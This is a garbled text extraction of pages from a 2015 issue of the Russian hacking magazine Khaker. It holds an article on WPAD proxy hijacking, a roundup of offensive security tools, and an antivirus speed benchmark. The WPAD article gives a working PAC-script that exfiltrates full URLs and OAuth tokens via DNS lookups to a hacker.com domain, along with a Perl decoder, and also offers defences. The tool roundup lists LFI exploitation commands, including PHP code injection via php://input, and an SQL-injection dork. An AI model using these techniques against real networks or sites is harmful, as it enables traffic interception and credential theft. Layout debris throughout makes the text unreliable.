Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

197_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

19.05 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 4 5 6 7 89 / 159 10 11 12 13 14 15 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P					NOW!				o
P

					BUY
w Click				to	ХАКЕР 06 /197/ 2015
				to						m
										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

WPAD для хакера

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
					BUY
			79
w Click				to						m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha


					1

Опротоколе

Рис. 1. Запросы, кото-

из PAC-файла, передает туда URL и хост, а в результате ожида-

WPAD (Web Proxy Auto Discovery protocol) служит для того, что-

рые делает Windows XP

ет узнать, через какие прокси ходить на этот адрес. Выглядит

бы найти файл PAC (Proxy Auto Config), представляющий собой

это примерно так:

JavaScript с описанием логики, по которой браузер будет опре-

Рис. 2. Запросы, кото-

function FindProxyForURL(url, host) {

делять, как подключаться к нужному URL. При совершении

рые делает Windows 7

любого запроса браузер вызывает функцию FindProxyForURL

if (host == "xakep.ru") {

return "PROXY proxy.

com:8080";

} else

if (host ==

"microsoft.com") {

return "PROXY

anotherproxy.com:5050";

} else {

return "DIRECT";

}

Помимо

FindProxyForURL,

в PAC-скрипте доступны различ-

ные

вспомогательные

функции

для более гибкой настройки. С их

WARNING

помощью можно, например, ука-

зать, что браузер должен откры-

вать google.com с трех до четырех

Вся информация

часов в субботу через proxy1.com,

предоставлена исклю-

весь день в воскресенье — через

чительно в ознакоми-

proxy2.com, а в другое время — во-

тельных целях. Лица,

обще ходить напрямую, без прок-

использующие данную

си-сервера.

информацию в противо-

Адрес PAC-скрипта можно про-

законных целях, могут

писать в настройках прокси бра-

быть привлечены к от-

узера в явном виде — например,

ветственности.

в Firefox это можно сделать в пун-

кте настроек под названием «URL

автоматической настройки сервиса

прокси». Однако

администратору

сети вряд ли захочется прописы-

вать настройки для всех браузеров

каждого клиента вручную. Гораздо

удобнее воспользоваться для это-

го WPAD.

КакработаетWPAD

Первым делом

WPAD

пытается

найти PAC-скрипт с помощью

опции от DHCP-сервера (однако

такая

возможность практически

не поддерживается браузерами),

а затем отправляет HTTP-запрос

на

http://wpad.%domain%/

wpad.dat и скачивает полученный

файл. При этом в различных опе-

рационных системах поиск файла

wpad.dat будет происходить по-

разному.

Предположим,

из

настроек

DHCP мы узнали, что имя домена —

msk.office.work.

Тогда

Windows

XP попытается найти его на wpad.

msk.office.work

(резолвинг до-

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
					BUY
w Click				to 80						m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

Взлом

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
					BUY
ХАКЕР 06 /197/ 2015
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

		5
Рис. 3. NBNS-спуфинг	ди них встречаются и более экзотические — от .work и .school
в локальной сети	до .ninja и .vodka. Имена этих доменов вполне могут быть про-
	писаны в опции domain-name DHCP-серверов. Таким образом,
Рис. 4. Свободные	если в domain-name будет указан домен .school и мы зареги-
для регистрации до-	стрируем домен wpad.school, то все запросы за WPAD-файлом
мены WPAD	попадут к нам. Причем, если посмотреть на wpad.TLD доменов
	первого уровня, мы увидим следующую картину (рис. 4).
Рис. 5. Количество об-	Пару лет назад я регистрировал домен wpad.co, на кото-
ращений к wpad.work:	рый действительно начали приходить многочисленные запро-
динамика по дням	сы за файлом wpad.dat. Но есть и более свежие свидетельства
недели	возможности перехватить то, что нам не предназначалось:
	месяц назад я зарегистрировал домен wpad.work. За один-

4Рис. 6. HTTP-запрос че- надцать дней к нему обратились с 3901 уникального IP.

рез прокси-сервер

Profit?

мена будет происходить через DNS), а потом просто на wpad.				Итак, мы заставили пользователей ходить через подконтроль-
office.work.				ный нам прокси-сервер. Что это нам дает? В случае HTTP-
•	http://wpad.msk.office.work/wpad.dat (DNS)			запросов — полный контроль над трафиком: заголовками и те-
•	http://wpad.office.work/wpad.dat (DNS)			лом запроса и ответа, всеми параметрами, cookies, данными
				сабмитов форм и так далее.
	Windows 7 ведет себя по-другому: сначала по DNS прове-			В случае с HTTPS мы увидим только метод CONNECT. Мак-
ряет полный домен, потом пытается зарезолвить имя WPAD				симум доступной нам информации — хост и user-agent. К со-
через Link-Local Multicast Name Resolution, а затем — с по-				жалению, самое интересное, то есть данные обмена между
мощью NetBIOS Name Service. Последние два являются ши-				клиентом и сервером после handshake, для нас будет выгля-
роковещательными протоколами, которые поддерживаются				деть лишь как набор бинарных данных.
Windows начиная с Vista.				BacktoPAC
•	http://wpad.msk.office.work/wpad.dat (DNS)
•	http://wpad/wpad.dat (LLMNR)			Несмотря на то что PAC-скрипт написан на JavaScript, в нем
•	http://wpad/wpad.dat (NBNS)			недоступны объекты window, document, не получится вывести
Использование
влокальнойсети
Представим себя на месте зло-
умышленника,		который	хочет
пустить весь локальный			трафик
через свой прокси-сервер. Если
мы находимся в том же сегменте
локальной сети и можем исполь-
зовать NetBIOS, то можно восполь-
зоваться готовым NBNS-спуфером
из Metasploit (рис. 3).
	Если же мы находимся в дру-
гой подсети, но в нашей сети есть
WINS-сервер, мы можем поднять
Windows-хост с именем WPAD, что-
бы WINS распространил информа-
цию о нас. Этот кейс вполне рабо-
чий: я тестировал его в достаточно
крупной локальной сети			одного
вуза, и на хост, находящийся в сети
даже меньше /24, начали прихо-
дить запросы с сотен различных IP.
Использование
винтернете
В настоящее время существует 861
домен первого		уровня.	Помимо
привычных .com, .net, .ru, .org, сре-					6

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P					NOW!				o
P

					BUY
w Click				to	ХАКЕР 06 /197/ 2015
				to						m
										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

WPAD для хакера

				hang	e
			C		e	E
		X				E
	-						d
	F							t
	D							i
	D							r
P					NOW!			o
P
				BUY
				BUY
w Click				to81					m
w
	w							o
	.						.c
		p				g
			df		n		e
				-x cha

пользователю alert (он будет отображен только в логах браузера). Тем не менее даже в этой урезанной версии есть свои приятные функции.

Одна из них — isResolvable — проверяет, возможно ли разрешить доменное имя в IP-адрес. Работает это так:

if (isResolvable(host))

return "PROXY proxy.com:8080";

Что нам может дать использование этой функции? Чтобы ответить на этот вопрос, сначала разберемся, что именно передается в функцию FindProxyForURL в аргументе URL. Ока-

Рис. 7. HTTPS-запрос через прокси-сервер

Рис. 8. JavaScriptфункции, доступные из PAC-скрипта

Рис. 9. Вызов FindProxyForURL в Chrome

Рис. 10. Вызов FindProxyForURL в Firefox

		зывается, это зависит от браузе-
		ра: Chrome передает схему, хост,
	запрос (GET-параметры), а вот
	Firefox вдобавок еще и фрагмент
	(location.hash). Например, URL
	http://mail.ru/?a=123#token=secret
	обработается следующим образом
	(см. рис. 9 и 10).
		Независимо от того, какой бра-
	узер используется, у нас есть пол-
	ный URL. Попытаемся, используя
	функцию isResolvable, перехватить
	URL. Для этого закодируем URL
	таким образом, чтобы он был ва-
	лидным именем хоста, и допишем
	d.wpad.work, в NS-записи которого
	прописан наш DNS-сервер, где мы
	же отвечаем на все запросы и логи-
	руем их.
		Итак, с помощью нехитрых пре-
	образований:
		function encode(str) {
		r = str.toLowerCase()
		.replace
		(/([^a-z1-9])/g
7		function(m) {

		return "0" +
		m.charCodeAt(0)

})

.replace(/([^\.]{60})(.)/g, '$1.$2')

.substr(0, 240);

return r + (r.slice(-1) != "." ? "." : "")

+ "hacker.com";

}

function FindProxyForURL(url, host) {

var u = encode(url);

return isResolvable(u) ? "DIRECT" : "DIRECT";

}

наш тестовый URL https://example.ru/?token=123 превращается в https058047047example046ru047063token061123. hacker.com, из которого можно достать исходную строку, например вот таким однострочником на Perl:

echo 'https058047047example046ru047063toke

n061123.hacker.com' \

| perl -lape 's/\.hacker\.com$//; s/\

.//g; s/0(..)/chr($1)/eg;'

Не секрет, что в фрагменте URL (location.hash) часто передаются OAuth-токены. Таким образом, в случае использования Firefox к нам в руки могут попасть и они.

Итоги

С помощью WPAD можно, невзирая на HTTPS, перехватывать локальный трафик, токены OAuth и другую информацию из URL. То же можно сделать и в сети Интернет, зарегистрировав домен wpad.LTD и попробовав поймать случайных жертв на эту ловушку.

Теперь, используя имеющиеся у нас знания, посмотрим, как защититься от потенциальных атак с помощью WPAD. Ниже — основные рекомендации, выполнение которых позволит обезопасить свой трафик:

•Не использовать «чужие» домены. Обычно советуют при отсутствии своего домена использовать .local, но я бы не рекомендовал этого делать, поскольку злоумышленник сможет совершить атаку через

broadcast-резолверы, которые используют тот же домен, в частности Bonjour. Оптимально использовать зарегистрированное тобой доменное имя, и даже необязательно делать его разрешимым снаружи.

•Резервировать адреса wpad в доменных зонах.

•Отключить автоматическое определение настроек в настройках всех браузеров (для IE и Chrome это можно сделать через доменные политики).

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
					BUY
w Click				to 82						m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

Взлом

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
					BUY
ХАКЕР 06 /197/ 2015
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

WARNING

Внимание! Информация предоставлена исключительно с целью ознакомления! Ни авторы, ни редак-

ция за твои действия ответственности не несут!

Дмитрий «D1g1» Евдокимов

Digital Security

X-Tools @evdokimovds

Софт для взлома и анализа безопасности

Автор: Patrick Wardle

Автор: t00sh

Авторы: P0cL4bs

Система: Mac

Система: Linux

Team

URL: https://

URL: https://github.

Система: Linux

objective-see.com/

com/t00sh/rop-tool

URL: https://github.

products/dhs.html

com/P0cL4bs/

Kadimus

DylibHijackScanner

rop-tool

LFIкаксемечки

Про DLL hijack на ОС Windows, я уверен, все знают

Rop-tool — это инструмент, помогающий писать

Kadimus — это инструмент на си для проверки

и даже находили и использовали. Но напомню:

эксплойты для бинарных уязвимостей. Про-

сайтов на наличие LFI (Local File Inclusion) уязви-

заключается она в том, что из-за неправильной

грамма представляет собой некий комбайн, хотя

мости и ее эксплуатации.

последовательности поиска программой DLL-

и не может похвастаться каким-то уникальным

Особенности:

библиотек атакующий может подложить свою

функционалом по сравнению с аналогами.

• проверка всех URL-параметров;

DLL с вредоносным функционалом (Microsoft

Инструмент имеет четыре основные команды:

•

/var/log/auth.log RCE;

Security Advisory 2269637). Как оказалось,

• gadget — отвечает за поиск ROP-гаджетов;

•

/proc/self/environ RCE;

данная проблема существует и в Mac, только

• patch — помогает патчить бинарный исполня-

•

php://input RCE;

для dylib-библиотек. Все это может быть из-за

емый файл;

•

data://text RCE;

нескольких вещей:

• info — отображает основную информацию

•

раскрытие исходного кода;

• LC_LOAD_WEAK_DYLIB;

о бинарном исполняемом файле;

•

мультипоточность;

• @RPATHS;

• search — производит поиск по бинарному

• командный shell-интерфейс через HTTP-

• LC_LOAD_DYLIB + LC_RPATH.

исполняемому файлу.

запросы;

• поддержка прокси (socks4://, socks4a://,

В принципе, возможна ситуация, когда раз-

Особенности:

socks5://, socks5h:// и http://);

деляемая библиотека не грузится по конкретно-

• поиск строк, поиск гаджетов, патчинг;

• прокси socks5 для bind connections.

му пути, а начинает искать в нескольких возмож-

• подсветка вывода;

ных местах, что как раз на руку злоумышленнику,

• Intel и AT&T синтаксис;

Пример сканирования:

которому только и остается положить правильно

• поддержка форматов ELF, PE и MACH-O;

./kadimus -U url_list.txt --threads 10

сформированную библиотеку по одному из этих

• поддержка big и little endian;

путей.

• поддержка архитектур x86 и x86_64.

--connect-timeout 10 --retry-times 0

Dylib hijack scanner (DHS) — это достаточно

простенькая утилита, которая сканирует ком-

В качестве движка дизассемблера использу-

Пример получения исходного кода файла:

пьютер на наличие приложений, подверженных

ется библиотека Capstone.

./kadimus -t localhost/?pg=contact -G

dylib hijacking или уже атакованных.

Примеры использования:

Во время своего исследования автор иден-

-f "index.php%00" -O local_output.php

тифицировал уязвимости таких приложений

# Поиск гаджета

--inject-at pg

под Mac, как iCloud Photos, Xcode, Word, Excel,

rop-tool g ./program

Dropbox и другие.

# Поиск строки в бинарнике

Пример выполнения PHP-кода:

За более детальным описанием данной уяз-

rop-tool s ./program -s "/bin/sh"

вимости советуем обратиться к презентации

# Поиск всех строк в бинарнике

./kadimus -t localhost/?pg=php://

автора «„DLL Hijacking“ on OS X? #@%& Yeah!»

rop-tool s ./program -a

input%00 -C '<?php echo "pwned"; ?>'

(https://s3.amazonaws.com/s3.synack.com/

# Пропатчить бинарник по смещению

-X input

canSecW.pdf) с конференции CanSecWest 2015.

0х1000 байтами \xaa\xbb\xcc\xdd

и сохранить как patched

При этом стоит также отметить появление

rop-tool p ./program -o 0x1000 -b "\

возможности проверять сайты и на RFI (Remote

xaa\xbb\xcc\xdd" -O patched

File Inclusion) уязвимость.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P					NOW!				o
P

					BUY						7 утилит для взлома и анализа безопасности
w Click				to	ХАКЕР 06 /197/ 2015						7 утилит для взлома и анализа безопасности
				to						m
										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

J2EEScan
J2EEScan			4
Автор: Enrico M.
Система: Windows/Linux
URL: https://github.com/ilmila/J2EEScan
J2EEScan — это плагин для извест-		•	Information Disclosure,
ного Burp Suite. Цель данного пла-		• Compliance Checks (HTTP Verb
гина — улучшить покрытие тестов			Tampering, Invoker Servlet и так
при пентестинге J2EE-приложений.			далее),
Реализовано это все в виде новых
тест-кейсов и новых подходов к об-		так и уязвимости конкретных сер-
наружению уязвимостей для J2EE-		веров приложений, в том числе:
приложений. Плагин способен де-		•	Apache Struts;
тектировать как общие уязвимости:		•	Grails;
•	Expression Language Injection,	•	Apache Wicket;	•	Tomcat;
•	Local File include,	•	Java Server Faces;	•	Oracle Application Server;
•	Incorrect Error Handling,	•	JBoss SEAM;	•	Jetty;
•	XML External Entity,	•	JBoss;	•	Apache Axis.

Автор: hasherezade		Автор: Антон Дедов
Система: Windows		Система: Windows/
URL: http://		Linux
hasherezade.net/ViDi/		URL: https://github.
		com/adedov/victims-
		version-search

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
					BUY
			83
w Click				to						m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Плагин активно развивается и время от времени пополняется новыми тест-кейсами на появившиеся уязвимости.

Автор:

peterubuntu10

Система: Linux

URL: http:// sourceforge.net/ projects/netoolsh/

ViDiVisualDisassembler

ViDi — это Visual Disassembler, инструмент для статического анализа исполняемых бинарных файлов, базирующийся на bearparser (библиотека для парсинга PE-формата) и Capstone. Эта библиотека дала в последнее время большой толчок для активного развития подобных инструментов.

ViDi — достаточно интересный проект ввиду своего подхода к анализу и отображению полученной информации из исполняемого файла. Например, на одном экране в разных окнах одновременно отображаются разные ветки работы программы после условного перехода. Или еще интересный момент — это возможность почти всему назначать свои собственные теги и комментировать строчки кода, тем самым повышая его информативность. Также повсеместное использование поисковых фильтров позволяет быстро и эффективно искать нужные данные.

Текущие возможности:

•PE/PE+, DOS MZ;

•x86, x64.

Вближайших планах появление поддержки ELF-файлов. А так как в основе лежит дизассемблер Capstone, то можно сказать, что автор не ограничивается только этими архитектурами и, скорее всего, пойдет дальше.

Хоть проект и молодой и находится в бетастадии, он все равно активно развивается.

victimsversionsearch

При анализе защищенности Java-приложения часто встает задача определить, не присутствуют ли в анализируемом программном обеспечении сторонние библиотеки с уже известными уязвимостями. И конечно, делать это вручную очень муторно.

Victims-version-search — это Python-скрипт, который ищет уязвимости в конкретных версиях JAR-пакетов. Для выполнения своего функционала скрипт обращается к базе данных victims-cve-db (https://github.com/victims/ victims-cve-db). Эта база данных поддерживается и обновляется, последнее обновление датировано текущим годом.

Для своей работы скрипт использует несколько источников информации:

1.Maven manifest (pom.xml), если он присутствует.

2. Версия из имени файла и имя файла как artifactId.

3.Версия из META-INF/MANIFEST.MF с именем файла как artifactId.

Из сторонних зависимостей:

•Python 2.6+;

•PyYAML;

•SQLite 3;

•локальная копия victims-cve-db базы данных.

При достаточно простом подходе к решению данной задачи инструмент показывает очень хорошие результаты и практическую пригодность в деле. И как обычно, наличие исходного кода позволяет улучшать и настраивать инструмент под себя и внутренние проекты. Например, команда безопасности может заточить инструмент под проекты и для ОС Android.

MitMPentestingOpensourceT00lkit

Наверное, никогда не наступят те времена, когда атака «человек посередине» (MITM) потеряет свою актуальность и уйдет в учебники истории. Атака продолжает работать, активно использоваться и в некоторых направлениях даже расцветать. Автоматизировать ее — одна из задач.

Netool — это toolkit на bash, Python, Ruby, который позволяет автоматизировать работу с такими фреймворками, как Nmap, Driftnet, SSLstrip, Metasploit и Ettercap MITM-атаки. Инструмент призван упростить снифинг TCP/UDPтрафика, атаки man-in-the-middle, SSL sniff, DNS spoofing, DOS-атаки в сетях WAN/LAN, манипуляцию пакетами TCP/UDP с использованием etterfilters. Он дает возможность захватывать картинки из браузерных сессий, а также использовать macchanger для смены MAC-адреса.

Ключевые модули позволяют автоматизировать также некоторые атаки через DNS Spoof + MITM (фишинг — социальная инженерия) с помощью Metasploit, Apache 2 и Ettercap.

Недавно был введен веб-сканер inurlbr, который позволяет искать SQL-уязвимости, используя несколько поисковых движков, также он может быть использован в сочетании с другими фреймворками, например Nmap.

Пример:

inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ??0x27 -s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
					BUY
w Click				to 84						m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

Malware

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
					BUY
ХАКЕР 06 /197/ 2015
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

][-тестирование:

самыйскоростной

internet

MarekPiotrowski@shutterstock.com

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P					NOW!				o
P

					BUY
w Click				to	ХАКЕР 06 /197/ 2015
				to						m
										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

][-тестирование: самый скоростной Internet Security

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
					BUY
			85
w Click				to						m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

McAfee Total Protection,

Microsoft Security

Essentials, Outpost Security

Денис Колисниченко Suite и Symantec Endpoint

securitydhsilabs@gmail.com Protec ion, KIS, Avas

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
					BUY
w Click				to 86						m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

Malware

Рис. 1. Конфигурация системы

Рис. 2. Инфа о видео карте

Рис. 3. Гостевая систе ма готова к работе

Рис. 4. Результат

3DMark

Рассматриваемыеантивирусы	Рис. 5. Время загрузки
В первой части статьи были рассмотрены следующие IS: KIS,	чистой системы
Dr.Web Security Space, Avira Antivirus Pro, Avast Internet
Security, NOD32 Smart Security и Comodo Internet Security.	Рис. 6. Protection
В этой статье список «подопытных кроликов» будет несколь-	Manager
ко другим, а именно: McAfee Total Protection, Microsoft
Security Essentials, Outpost Security Suite и Symantec
Endpoint Protection 12.1.5. Кроме этих новых IS, в тесте уча-
ствуют и старые знакомые — KIS и Avast Internet Security.
Эти два продукта уже тестировались в первой части статьи.
Зачем их нужно было тестировать заново? Дело в том, что же-
лезо у меня осталось тем же, а вот ОС относительно недавно
я переустановил. Поэтому, чтобы новые результаты можно
было хоть как-то сопоставить со старыми, пришлось взять два
продукта из предыдущего тестирования. Avast был выбран
как победитель предыдущего теста, а KIS — по рекомендации
редактора журнала «Хакер», которому кажется, что KIS немно-
го подтормаживает, хотя в прошлом тесте он показал весьма
неплохие результаты.
Напомню, что в качестве тестовой площадки использовал-
ся комп, который по совместительству работает моим домаш-
ним кинотеатром. Его конфигурация изображена на рис. 1 и 2.
Также напомню, что и как тестировалось. Сначала измеря-
лась абсолютно чистая система (Windows 7 Максимальная),
в которой никогда не был установлен IS.
Тестировалось следующее:
• Время загрузки системы — для измерения скорости за-
грузки системы использовалась программа BootRacer.
Она обеспечивает более точные результаты, чем измере-
ние скорости загрузки секундомером.
• Время завершения работы — с момента выбора команды
в меню «Пуск» до отключения питания. А вот время завер-
шения работы тестировалось именно с помощью секундо-
мера, как и все последующие метрики, кроме 3DMark.
• Запуск виртуальной машины VMware — в VMware у меня
есть виртуальная машина своей сборки Linux. Измерение
скорости ее запуска производилось с момента нажатия
кнопки Play в VMware до готовности гостевой системы
к работе (рис. 3).
• Запуск GIMP2 — в моем GIMP установлено много чего
(плагины, шрифты и прочее). При загрузке он загружает
большое количество мелких файлов. Интересно, как на его
работе отразится наличие IS?
• Баллы 3DMark — тут все просто, запускаются все тесты
3DMark (последней версии), и записывается полученный
результат. На рис. 4 — результат на «чистой» системе (ни
один IS еще не установлен).
В отличие от предыдущего теста не измерялось время за-
грузки большого документа. Тестов с помощью секундомера

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
					BUY
ХАКЕР 06 /197/ 2015
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P					NOW!				o
P

					BUY
w Click				to	ХАКЕР 06 /197/ 2015
				to						m
										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

hang

NOW!

BUY

][-тестирование: самый скоростной Internet Security

w Click

-x cha

Рис. 7. Symantec

системы — в ней нет ничего, кроме VMware и еще несколь-

Endpoint Protection

ких небольших программ (вроде проигрывателя и кодеков).

(клиент)

Всего 25 с.

В первой части статьи моя система (учитывая все, что в ней

Рис. 8. Время за

было установлено) загружалась за 38 с.

грузки системы после

Остальные результаты чистой системы следующие:

установки Symantec

• время завершения работы — 17 с;

Endpoint Protection

• время запуска виртуальной машины — 1 мин 5 с;

	• время запуска GIMP — 7 с;
Рис. 9. Вот так быстро	•	баллы 3DMark (тест Cloud Gate 1.1) — 3027;
работает система под	•	баллы 3DMark (тест Ice Storm 1.2) — 26 662 (рис. 4).
управлением Symantec

7Endpoint Protection SymantecEndpointProtection12.1.5

Хотелось бы начать с этого продукта. Почему именно с него? Да потому, что чем быстрее начну, тем быстрее закончу, чтобы забыть его и не вспоминать, как о страшном сне. Может быть, это прекрасный продукт для корпоративного использования, но по результатам нашего теста... Начнем даже с размера. Во-первых, Protection Manager (рис. 6) занимает 2,5 Гб и при этом не защищает систему. А чтобы получить антивирус с файрволом (то, собственно, ради чего мы все это и затеваем), нужно установить еще и клиент (рис. 7) весом… еще 1,5 Гб. Как по мне, антивирус с файрволом на 4 Гб кажется великоватым. Даже при современных размерах накопителей.

Но процесс установки клиента тоже оставляет желать лучшего. Чтобы понять, как это сделать, пришлось просмотреть обучающий ролик от Symantec. И тут я в себе засомневался: или переработал, или действительно непонятно сделали. В общем, рекомендовать этот продукт конечному пользователю (хотя он и называется endpoint) нельзя.

8	Результаты тоже весьма посредственны:
	Результаты тоже весьма посредственны:
	• время запуска системы — 53 с;
	• время завершения работы — 23 с;
	• время запуска виртуальной системы — 1 мин 26 с;
	• время запуска GIMP — 18 с;
	• баллы в Cloud Gate 1.1 — 3025;
	• баллы в Ice Storm — 26 090.
	Время загрузки системы увеличилось до 53 с, но это только
	после установки клиента Symantec Endpoint Protection. Сама
	установка Protection Manager ни на что не влияет (если не счи-
	тать те 2,5 Гб на харддрайве).
	Система работает с ощутимыми тормозами. Несмотря
	на то что BootRacer сообщает, что можно приступать к рабо-
	те, попробуй нажать кнопку «Пуск». Увидишь картину, изобра-
	женную на рис. 9. Да, открываешь главное меню, и еще нужно
	ждать несколько секунд, пока прогрузятся значки. Если чест-
	но, то уже не мог дождаться, когда его удалю.

и так много — и время завершения работы, и время загрузки виртуальной машины, и время запуска GIMP. Еще один подобный тест просто не нужен. Тем более по результатам предыдущего теста стало ясно, что наличие IS особо на время открытия этого документа не влияет, и только в одном случае было налицо замедление открытия файла. В остальных случаях все было в пределах погрешности, а она немаленькая, учитывая человеческий фактор.

Прежде чем начать тестирование, программой BootRacer я измеряю время загрузки практически девственно чистой

Protection Manager занимает 2,5 Гб и при этом

не защищает систему. А чтобы получить антивирус с файрволом, нужно установить еще и клиент весом 1,5 Гб

OutpostSecuritySuite

Этот продукт мне давно знаком — еще со времен его файрвола. Теперь это полноценный Internet Security Suite, то есть файрвол плюс антивирус. Не знаю, как он определяет вирусы, но с задачами файрвола справляется превосходно. Да и в отличие от предыдущего программного продукта весит всего 305 Мб.

Система под его надзором работала довольно шустро: если не считать замедления времени запуска, то можно сказать, что ничего не поменялось и ощутимых тормозов не было — только постоянно надоедающее уведомление об автоматическом создании правил в режиме обучения. Время загрузки системы увеличилось, но после этих сорока секунд можно сразу приступить к работе, а не ждать, пока что-то еще прогрузится. Вполне неплохо.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
					BUY
w Click				to 88						m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

Malware

hang

NOW!

BUY

ХАКЕР 06 /197/ 2015

w Click

-x cha

Рис. 10. Время за

грузки системы под

управлением Outpost

Рис. 11. Результат

3DMark (Ice Storm)

Рис. 12. Время запуска

системы (McAfee Total

Protection)

Рис. 13. Время запуска

системы (MSSE)

Рис. 14. Microsoft

Security Essentials

Результаты:

• время запуска системы — 41 с;

• время завершения работы — 18 с;

• время запуска виртуальной системы — 1 мин 9 с;

• время запуска GIMP — 9 с;

• баллы в Cloud Gate 1.1 — 3027;

• баллы в Ice Storm — 26 409.

С GIMP, правда, случился небольшой конфуз. Запускаю, а окошко появилось лишь 42 с спустя. Закрыл, запустил заново — 9 с. Или это так проявился первый запуск под управлением Outpost, или же это глюк самого GIMP.

McAfeeTotalProtection

Продукт от McAfee тоже не может похвастаться выдающимися результатами. Это единственный продукт в тесте, который существенно затормозил работу графики (во всяком случае, на моей системе). Его результаты:

11	• время запуска системы — 47 с (рис. 12);
	• время запуска системы — 47 с (рис. 12);
	• время завершения работы — 20 с;
	• время запуска виртуальной системы — 1 мин 11 с;
	• время запуска GIMP — 15 с;
	• баллы в Cloud Gate 1.1 — 3009;
	• баллы в Ice Storm — 25 989.

MicrosoftSecurityEssentials

MSSE сам по себе не является IS, но вместе с брандмауэром Windows может таковым считаться. Придворный антивирус Windows показал отменную производительность. Не знаю, насколько эффективно он справляется с защитой системы (что-то мне подсказывает, что не очень), но система под его управлением загрузилась всего за 37 с, и это лишь на 12 с медленнее, чем система вообще без антивируса. Время завершения работы — такое же. Виртуальная машина запускается чуть медленнее по сравнению со «стоком», а вот GIMP почему-то запускался медленнее всех. Результаты в 3DMark чуть ниже, но на глаз это заметно не было — только цифры.

12	На рис. 13 изображены результаты продукта, а на рис. 14 —
	На рис. 13 изображены результаты продукта, а на рис. 14 —
	сам продукт (вдруг его кто-то не видел).
	Теперь мы переходим к нашим джокерам — Kaspersky
	Internet Security и Avast.

Джокеры

KIS (MD 2015) традиционно замедляет загрузку системы. Правда, на этот раз после второй перезагрузки поведение системы не изменилось, и она так же подтормаживала. Результаты, скажем так, не впечатляют. Хотя BootRacer и сообщил 37 с, по факту система загружалась значительно дольше (рис. 15).

		KIS (MD 2015) традиционно замедляет загрузку
		системы. Правда, на этот раз после второй
		перезагрузки поведение системы не изменилось,
		и она так же подтормаживала
	13	и она так же подтормаживала
	13

<<< < Предыдущая 1 2 3 4 5 6 7 89 / 159 10 11 12 13 14 15 > Следующая >>>

Соседние файлы в папке журнал хакер

#
19.04.202425.3 Mб12192_Optimized.pdf
#
19.04.202433.24 Mб12193_Optimized.pdf
#
19.04.202455.88 Mб12194_compressed.pdf
#
20.04.202417.37 Mб12195_Optimized.pdf
#
20.04.202418.23 Mб12196_Optimized.pdf
#
20.04.202419.05 Mб12197_Optimized.pdf
#
20.04.202462.63 Mб12198_Optimized.pdf
#
20.04.202454.2 Mб12199_Optimized.pdf
#
20.04.202421.92 Mб12200_Optimized.pdf
#
20.04.202417.2 Mб12201_Optimized.pdf
#
20.04.202413.99 Mб13202_Optimized.pdf